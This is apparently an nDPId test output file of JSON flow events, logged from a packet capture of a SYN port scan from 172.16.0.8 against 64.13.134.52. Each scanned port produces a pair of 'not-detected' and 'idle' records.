-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 